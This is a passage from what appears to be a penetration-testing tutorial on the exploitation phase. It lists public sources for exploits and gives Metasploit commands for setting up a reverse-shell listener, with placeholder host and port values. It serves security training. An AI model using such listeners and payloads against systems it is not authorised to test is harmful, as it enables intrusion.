Exploitation
In the exploitation phase, you exploit a vulnerability found on the target machine and get a remote shell. That's it! Simple, right? Let's get started.
Finding exploits
Generally speaking, 99% of the time, the vulnerability scanner will tell you where to find the exploit in order to replicate it from your end. Here's where to find most of the exploits:
- Google it: it sounds simple, but it's my favorite method
- Exploit-db at http://www.exploit-db.com
- The searchsploit tool in Kali Linux
- Metasploit: use the search command to find it
- Security Focus at http://www.securityfocus.com
- Sometimes you will find them on GitHub, at http://www.github.com
Listener setup
Before uploading and executing the payload, you will need to set up and execute a listener on Kali Linux.
To create a listener using Metasploit, enter the following:
use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set ExitOnSession false
...